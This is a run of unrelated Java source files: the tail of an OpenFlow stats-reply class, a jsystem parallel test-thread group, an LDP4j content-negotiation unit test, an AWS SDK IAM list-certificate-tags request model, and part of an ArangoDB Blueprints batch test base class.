b.append("xid=").append(xid); b.append(", "); b.append("flags=").append(flags); b.append(", "); b.append("entries=").append(entries); b.append(")"); return b.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; OFBsnSwitchPipelineStatsReplyVer14 other = (OFBsnSwitchPipelineStatsReplyVer14) obj; if( xid != other.xid) return false; if (flags == null) { if (other.flags != null) return false; } else if (!flags.equals(other.flags)) return false; if (entries == null) { if (other.entries != null) return false; } else if (!entries.equals(other.entries)) return false; return true; } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * (int) (xid ^ (xid >>> 32)); result = prime * result + ((flags == null) ? 0 : flags.hashCode()); result = prime * result + ((entries == null) ? 0 : entries.hashCode()); return result; } }
/* * Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved. */ package jsystem.extensions.threads; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import jsystem.framework.fixture.FixtureManager; import jsystem.framework.report.ListenerstManager; import jsystem.framework.report.ReportElement; import jsystem.framework.report.Reporter; import jsystem.framework.report.Reporter.EnumReportLevel; import junit.framework.AssertionFailedError; import junit.framework.SystemTestCase; import junit.framework.TestListener; import junit.framework.TestResult; /** * This class manages a group of tests that will be executed in parallel. */ public class TestThreadGroup { private String groupName; private HashMap<String, ThreadedTest> threadedTests = new HashMap<String, ThreadedTest>(); TestThreadGroup(String groupName) { this.groupName = groupName; } /** * Add a new test to the group. * @param test - test to add. */ public void addTest(SystemTestCase test){ FixtureManager fm = FixtureManager.getInstance(); // set current fixture test.setFixture(fm.getFixture(fm.getCurrentFixture()).getClass()); ThreadedTest threadedTest = new ThreadedTest(test); if (!test.getTestDocumentation().isEmpty()){ threadedTests.put(test.getTestDocumentation(), threadedTest); } else { threadedTests.put(test.getName(), threadedTest); } } /** * Start the execution of all the tests that were added. */ public void start(){ ListenerstManager.getInstance().startBufferingReports(true); for (String threadName : threadedTests.keySet()) { threadedTests.get(threadName).setName(threadName); if (TestThreadFactory.getInstance().isRunInParallel()){ threadedTests.get(threadName).start(); } else { threadedTests.get(threadName).run(); } } } /** * Join all the executions. * @param timeout - the time to wait in milliseconds. * @throws Exception */ public void join(long timeout) throws Exception{ ListenerstManager.getInstance().report("Joining " + threadedTests.size()+ " running tests"); for (String threadName : threadedTests.keySet()) { threadedTests.get(threadName).join(timeout); } ListenerstManager.getInstance().report("Finished joining " + threadedTests.size() + " running tests"); for (String threadName : threadedTests.keySet()) { if(threadedTests.get(threadName).isAlive()){ ListenerstManager.getInstance().report("Thread name '" + threadName + "' was still alive after timeout - interrupting thread", false); threadedTests.get(threadName).interrupt(); } } ListenerstManager.getInstance().stopBufferingReports(); List<ReportElement> list = ListenerstManager.getInstance().getReportsBuffer(); if (list == null){ return; } ListenerstManager.getInstance().clearReportsBuffer(); HashMap<String, List<ReportElement>> reportsGroup = new HashMap<String, List<ReportElement>>(); //sort reports according to the threaded tests for(ReportElement el: list){ if(!reportsGroup.containsKey(el.getOriginator())){ ArrayList<ReportElement> group = new ArrayList<ReportElement>(); reportsGroup.put(el.getOriginator(), group); } reportsGroup.get(el.getOriginator()).add(el); } if (TestThreadFactory.getInstance().isRunInParallel()){ for (String threadName : threadedTests.keySet()) { ListenerstManager.getInstance().startLevel(threadName, EnumReportLevel.CurrentPlace); //print buffered reports under correct level for(ReportElement el: reportsGroup.get(threadName)){ //set threaded test fail status if (el.getStatus() == Reporter.FAIL){ threadedTests.get(threadName).setPass(false); // if report fail was found if (threadedTests.get(threadName).getTest().getTestResult().wasSuccessful()){ threadedTests.get(threadName).setFailReports(true); } // if exception fail was found else { continue; } } ListenerstManager.getInstance().report(el); } if (!threadedTests.get(threadName).isPass()){ if (threadedTests.get(threadName).isFailReports()){ threadedTests.get(threadName).setPass(false); //print exception fail report, if exist threadedTests.get(threadName).getTest().setPass(false); threadedTests.get(threadName).getTest().getTestResult().addFailure(threadedTests.get(threadName).getTest(), new AssertionFailedError("Fail report was submitted")); threadedTests.get(threadName).setThrown(threadedTests.get(threadName).getTest().getTestResult().failures().nextElement().thrownException()); ListenerstManager.getInstance().addFailure(threadedTests.get(threadName).getTest(), (AssertionFailedError)threadedTests.get(threadName).getThrown()); } else if (threadedTests.get(threadName).getTest().getTestResult().errorCount() > 0) { //print exception message, if thrown threadedTests.get(threadName).getTest().setPass(false); threadedTests.get(threadName).setThrown(threadedTests.get(threadName).getTest().getTestResult().errors().nextElement().thrownException()); ListenerstManager.getInstance().addError(threadedTests.get(threadName).getTest(), threadedTests.get(threadName).getThrown()); } } ListenerstManager.getInstance().stopLevel(); } } else { for(ReportElement el: reportsGroup.get("main")){ ListenerstManager.getInstance().report(el); } } TestThreadFactory.getInstance().removeGroup(groupName); } /** * @return group name. */ public String getGroupName() { return groupName; } } /** * This class execute group tests in parallel. * */ class ThreadedTest extends Thread{ private SystemTestCase test; public SystemTestCase getTest() { return test; } public void setTest(SystemTestCase test) { this.test = test; } private boolean isPass = false; private boolean failReports = false; private Throwable thrown; public ThreadedTest(SystemTestCase test){ this.test = test; } /** * Run the test. */ public void run(){ test.run(new TestResult() { public void addListener(TestListener listener) { } }); isPass = test.getTestResult().wasSuccessful(); //print exception reports, if exist if (!isPass){ if (test.getTestResult().errorCount() > 0) { thrown = test.getTestResult().errors().nextElement().thrownException(); } ListenerstManager.getInstance().addError(test, thrown); } } public void setPass(boolean isPass) { this.isPass = isPass; } /** * @return true if test was failed. */ public boolean isPass() { return isPass; } /** * @return true if test was failed with reports. */ public boolean isFailReports() { return failReports; } public void setFailReports(boolean failReports) { this.failReports = failReports; } public void setThrown(Throwable thrown) { this.thrown = thrown; } /** * @return exception that thrown by the test. */ public Throwable getThrown() { return thrown; } }
/** * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * This file is part of the LDP4j Project: * http://www.ldp4j.org/ * * Center for Open Middleware * http://www.centeropenmiddleware.com/ * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Copyright (C) 2014-2016 Center for Open Middleware. * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Artifact : org.ldp4j.commons:ldp4j-commons-http:0.2.2 * Bundle : ldp4j-commons-http-0.2.2.jar * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# */ package org.ldp4j.http; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.nullValue; import static org.junit.Assert.fail; import java.nio.charset.StandardCharsets; import java.util.Collection; import java.util.Locale; import java.util.Map.Entry; import org.junit.Rule; import org.junit.Test; import org.junit.rules.TestName; import org.ldp4j.http.Quality.Type; import com.google.common.base.Joiner; import com.google.common.base.Optional; import com.google.common.collect.Multimap; public class ContentNegotiatorTest { @Rule public TestName name=new TestName(); private static final MediaType TEXT_HTML = MediaTypes.of("text", "html"); private static final MediaType POSTSCRIPT = MediaTypes.of("application", "postscript"); private static final CharacterEncoding UTF_8 = CharacterEncodings.of(StandardCharsets.UTF_8); private static final CharacterEncoding US_ASCII = CharacterEncodings.of(StandardCharsets.US_ASCII); private static final CharacterEncoding ISO_8859_1 = CharacterEncodings.of(StandardCharsets.ISO_8859_1); private static final Language FRENCH = Languages.of(Locale.FRENCH); private static final Language ENGLISH = Languages.of(Locale.ENGLISH); private static final Language GERMAN = Languages.of(Locale.GERMAN); @Test public void negotiatesWithNoSupportedAlternatives() throws Exception { checkCannotNegotiate(specRequirementsNegotiator()); } @Test public void negotiatesWithNoAcceptableRequirements() throws Exception { NegotiationResult result = baseNegotiator(). support(POSTSCRIPT). support(TEXT_HTML). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, POSTSCRIPT, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(4)); } @Test public void negotiatesWithGenericSupportedEntities() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(POSTSCRIPT). support(TEXT_HTML). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, TEXT_HTML, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(4)); } @Test public void negotiatesWithOverridingAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(ContentNegotiator.DEFAULT_MEDIA_TYPE). support(POSTSCRIPT). support(FRENCH). support(ENGLISH). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(0.9D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(1.0D)). negotiate(); checkNegotiation( result, true, TEXT_HTML, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(6)); } @Test public void negotiationMightResultInSpeculativeChoices() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(1.0D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.8D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(0.5D)). negotiate(); checkNegotiation( result, true, POSTSCRIPT, null, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(3)); } @Test public void negotiationDoesNotEnrichPredefinedAlternatives() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). acceptCharset("us-ascii;q=0.1"). acceptCharset("*;q=0.5"). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(1.0D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.8D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(0.5D)). negotiate(); checkNegotiation( result, true, POSTSCRIPT, null, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(3)); } @Test public void negotiationDoesNotEnrichMissingAttributesWithSpeculativeValues() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, ContentNegotiator.DEFAULT_MEDIA_TYPE, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); } @Test public void negotiationEnrichesMissingAttributesWithDefiniteValues() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). acceptCharset("us-ascii;q=0.1"). acceptCharset("utf-8;q=0.5"). support(TEXT_HTML). support(POSTSCRIPT). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, POSTSCRIPT, UTF_8, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(4)); } @Test public void negotiatesWithPredefinedAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(0.9D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(1.0D)). negotiate(); checkNegotiation( result, true, TEXT_HTML, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(3)); } @Test public void doesNotAddContentLanguageHeaderIfNotAvailable() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).alternative(1.0D)). negotiate(); checkNegotiation( result, true, TEXT_HTML, null, null, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); assertThat(result.responseHeaders(true).containsKey(ContentNegotiation.CONTENT_LANGUAGE),equalTo(false)); } @Test public void failsNegotiationIfCannotFindAlternative() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).language(GERMAN).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).language(GERMAN).alternative(1.0D)). negotiate(); checkNegotiation( result, false, null, null, null, null, null, Optional.of(2)); } @Test public void negotiatesCharsetsOnlyRequirements() throws Exception { NegotiationResult result = baseNegotiator(). support(UTF_8). support(US_ASCII). support(ISO_8859_1). acceptCharset("utf-8;q=0.3"). acceptCharset("iso-8859-1;q=0.5"). acceptCharset("*;q=0.8"). negotiate(); checkNegotiation( result, true, ContentNegotiator.DEFAULT_MEDIA_TYPE, ISO_8859_1, ContentNegotiator.DEFAULT_LANGUAGE, Optional.of(Quality.Type.DEFINITE), null, Optional.of(3)); } @Test public void negotiatesWithoutMediaTypeAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().language(FRENCH).alternative(0.7D)). support(Variants.builder().language(ENGLISH).alternative(1.0D)). negotiate(); checkNegotiation( result, true, null, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); } @Test public void ignoresNullAsSupportedMediaTypes() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((MediaType)null)); } @Test public void ignoresNullAsSupportedCharacterEncoding() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((CharacterEncoding)null)); } @Test public void ignoresNullAsSupportedLanguage() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((Language)null)); } @Test public void ignoresNullAsSupportedAlternative() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((Alternative)null)); } @Test public void defaultErrorVariantHasDefaultValues() throws Exception { checkDefaultErrorVariant(ContentNegotiator.newInstance().onError()); } @Test public void canChangeErrorVariant() throws Exception { Variant original = ImmutableVariant.newInstance().type(POSTSCRIPT).charset(ISO_8859_1).language(GERMAN); final ContentNegotiator sut = ContentNegotiator.newInstance().onError(original); final Variant variant = sut.onError(); assertThat(variant.type(),equalTo(original.type())); assertThat(variant.charset(),equalTo(original.charset())); assertThat(variant.language(),equalTo(original.language())); } @Test public void changingErrorVariantToNullResultsInDefaultErrorVariant() throws Exception { Variant original = ImmutableVariant.newInstance().type(POSTSCRIPT).charset(ISO_8859_1).language(GERMAN); final ContentNegotiator sut = ContentNegotiator.newInstance().onError(original).onError(null); checkDefaultErrorVariant(sut.onError()); } private void checkCannotNegotiate(ContentNegotiator negotiator) { try { negotiator.negotiate(); fail("Should not be able to negotiate if no alternatives where defined"); } catch (CannotNegotiateException e) { } } private ContentNegotiator baseNegotiator() { return ContentNegotiator.newInstance(); } private ContentNegotiator specRequirementsNegotiator() { return baseNegotiator(). accept("text/html;q=1.0"). accept("*/*;q=0.8"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"); } private void checkNegotiation( NegotiationResult negotiation, boolean accepted, MediaType type, CharacterEncoding charset, Language language, Optional<Type> qualityType, Optional<Double> qualityWeight, Optional<Integer> numberOfAlternatives) { dumpNegotiation(negotiation); assertThat(negotiation.isAcceptable(),equalTo(accepted)); if(accepted) { assertThat(negotiation.variant().type(),equalTo(type)); assertThat(negotiation.variant().charset(),equalTo(charset)); assertThat(negotiation.variant().language(),equalTo(language)); } else { assertThat(negotiation.variant(),nullValue()); assertThat(negotiation.quality(),nullValue()); } if(qualityWeight!=null) { assertThat(negotiation.quality().weight(),equalTo(qualityWeight.orNull())); } if(qualityType!=null) { assertThat(negotiation.quality().type(),equalTo(qualityType.orNull())); } if(numberOfAlternatives!=null) { assertThat(negotiation.alternatives().size(),equalTo(numberOfAlternatives.orNull())); } } private void dumpNegotiation(NegotiationResult negotiation) { System.out.println("Content negotiation ["+name.getMethodName()+"]:"); if(negotiation.isAcceptable()) { System.out.printf("- Acceptable (%s): %s%n",negotiation.quality(),negotiation.variant()); } else { System.out.printf("- Not acceptable%n"); } try { dumpAlternatives(negotiation.alternatives()); } catch (Exception e) { System.out.println("* Failed to dump alternatives: "); e.printStackTrace(System.out); } try { dumpHeaders(negotiation, true); } catch (Exception e) { System.out.println("* Failed to dump accepted headers: "); e.printStackTrace(System.out); } try { dumpHeaders(negotiation, false); } catch (Exception e) { System.out.println("* Failed to dump failed headers: "); e.printStackTrace(System.out); } System.out.println(); } private void dumpAlternatives(Alternatives alternatives) { System.out.println("- Alternatives:"); for(int i=0;i<alternatives.size();i++) { Alternative a=alternatives.alternative(i); Quality q=alternatives.quality(i); System.out.printf(" + %s %s%n",q,a); } } private void dumpHeaders(NegotiationResult result, boolean status) { System.out.printf("- %s response headers:%n",status?"Accepted":"Rejected"); Multimap<String,String> headers=result.responseHeaders(status); for(Entry<String, Collection<String>> entry:headers.asMap().entrySet()) { System.out.printf(" + %s: %s%n",entry.getKey(),Joiner.on(", ").join(entry.getValue())); } } private void checkDefaultErrorVariant(final Variant variant) { assertThat(variant.type(),equalTo(ContentNegotiator.DEFAULT_MEDIA_TYPE)); assertThat(variant.charset(),equalTo(ContentNegotiator.DEFAULT_CHARACTER_ENCODING)); assertThat(variant.language(),equalTo(ContentNegotiator.DEFAULT_LANGUAGE)); } }
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.identitymanagement.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iam-2010-05-08/ListServerCertificateTags" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ListServerCertificateTagsRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> */ private String serverCertificateName; /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> */ private String marker; /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> */ private Integer maxItems; /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> * * @param serverCertificateName * The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- */ public void setServerCertificateName(String serverCertificateName) { this.serverCertificateName = serverCertificateName; } /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> * * @return The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- */ public String getServerCertificateName() { return this.serverCertificateName; } /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> * * @param serverCertificateName * The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- * @return Returns a reference to this object so that method calls can be chained together. */ public ListServerCertificateTagsRequest withServerCertificateName(String serverCertificateName) { setServerCertificateName(serverCertificateName); return this; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @param marker * Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. */ public void setMarker(String marker) { this.marker = marker; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @return Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. */ public String getMarker() { return this.marker; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @param marker * Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. * @return Returns a reference to this object so that method calls can be chained together. */ public ListServerCertificateTagsRequest withMarker(String marker) { setMarker(marker); return this; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @param maxItems * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. */ public void setMaxItems(Integer maxItems) { this.maxItems = maxItems; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @return Use this only when paginating results to indicate the maximum number of items you want in the response. * If additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element * is <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. */ public Integer getMaxItems() { return this.maxItems; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @param maxItems * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. * @return Returns a reference to this object so that method calls can be chained together. */ public ListServerCertificateTagsRequest withMaxItems(Integer maxItems) { setMaxItems(maxItems); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getServerCertificateName() != null) sb.append("ServerCertificateName: ").append(getServerCertificateName()).append(","); if (getMarker() != null) sb.append("Marker: ").append(getMarker()).append(","); if (getMaxItems() != null) sb.append("MaxItems: ").append(getMaxItems()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof ListServerCertificateTagsRequest == false) return false; ListServerCertificateTagsRequest other = (ListServerCertificateTagsRequest) obj; if (other.getServerCertificateName() == null ^ this.getServerCertificateName() == null) return false; if (other.getServerCertificateName() != null && other.getServerCertificateName().equals(this.getServerCertificateName()) == false) return false; if (other.getMarker() == null ^ this.getMarker() == null) return false; if (other.getMarker() != null && other.getMarker().equals(this.getMarker()) == false) return false; if (other.getMaxItems() == null ^ this.getMaxItems() == null) return false; if (other.getMaxItems() != null && other.getMaxItems().equals(this.getMaxItems()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getServerCertificateName() == null) ? 0 : getServerCertificateName().hashCode()); hashCode = prime * hashCode + ((getMarker() == null) ? 0 : getMarker().hashCode()); hashCode = prime * hashCode + ((getMaxItems() == null) ? 0 : getMaxItems().hashCode()); return hashCode; } @Override public ListServerCertificateTagsRequest clone() { return (ListServerCertificateTagsRequest) super.clone(); } }
package com.arangodb.blueprints.batch.test; import java.util.Iterator; import org.junit.After; import org.junit.Before; import com.arangodb.ArangoException; import com.arangodb.blueprints.ArangoDBEdge; import com.arangodb.blueprints.ArangoDBGraph; import com.arangodb.blueprints.ArangoDBVertex; import com.arangodb.blueprints.client.ArangoDBConfiguration; import com.arangodb.blueprints.client.ArangoDBSimpleGraphClient; import com.arangodb.entity.GraphEntity; import com.tinkerpop.blueprints.Element; public abstract class ArangoDBBatchTestCase { /** * the client */ protected ArangoDBSimpleGraphClient tmpClient; /** * the configuration */ protected ArangoDBConfiguration configuration; /** * name of the test graph */ protected final String graphName = "test_batch_graph1"; /** * name of the test vertex collection */ protected final String vertices = "test_batch_vertices1"; /** * name of the test edge collection */ protected final String edges = "test_batch_edges1"; /** * delete a graph in ArangoDB * * @param name * the name of the graph */ protected void deleteGraph(String name) { try { tmpClient.getDriver().deleteGraph(name); } catch (ArangoException e) { } } /** * check for graph name * * @param name * the name of the graph * @return true if graph was found */ protected boolean hasGraph(String name) { try { GraphEntity graph = tmpClient.getDriver().getGraph(name); if (graph != null) { return true; } } catch (Exception e) { } return false; } /** * delete a collection in ArangoDB * * @param name * the name of the collection */ protected void deleteCollection(String name) { try { tmpClient.getDriver().deleteCollection(name); } catch (ArangoException e) { } } /** * checks the internal "_id" property in an ArangoDB vertex and edge object * * @param element * the vertex or the edge object * @return true, if the element has a none empty "_id" attribute */ protected boolean has_id(Element element) { if (element == null) { return false; } if (element.getClass().equals(ArangoDBVertex.class)) { ArangoDBVertex a = (ArangoDBVertex) element; if (a.getRaw().getProperty("_id") != null) { return true; } } else if (element.getClass().equals(ArangoDBEdge.class)) { ArangoDBEdge a = (ArangoDBEdge) element; if (a.getRaw().getProperty("_id") != null) { return true; } } else if (element.getClass().equals(ArangoDBGraph.class)) { ArangoDBGraph a = (ArangoDBGraph) element; if (a.getRawGraph().getGraphEntity().getDocumentKey() != null) { return true; } } return false; } /** * checks for properties in an ArangoDB vertex and edge object * * @param element * the vertex or the edge object * @param key * the property name * @param expects * the expected value of the attribute * @return true, if the element has a none empty "_id" attribute */ protected boolean hasProperty(Element element, String key, Object expects) { if (element == null) { return false; } if (element.getClass().equals(ArangoDBVertex.class)) { ArangoDBVertex a = (ArangoDBVertex) element; if (expects.equals(a.getProperty(key))) { return true; } } else if (element.getClass().equals(ArangoDBEdge.class)) { ArangoDBEdge a = (ArangoDBEdge) element; if (expects.equals(a.getProperty(key))) { return true; } } else if (element.getClass().equals(ArangoDBGraph.class)) { // ArangoDBGraph a = (ArangoDBGraph) element; // if (expects.equals(a.getProperty(key))) { // return true; // } } return false; } /** * count the number of elements * * @param iter * the iterator * @return the number of elements (or -1 for iter == null) */ protected int countElements(Iterator<?> iter) { if (iter == null) { return -1; } int count = 0; while (iter.hasNext()) { ++count; iter.next(); } return count; } protected int countElements(Iterable<?> iterable) { Iterator<?> iter = iterable.iterator(); return countElements(iter); } 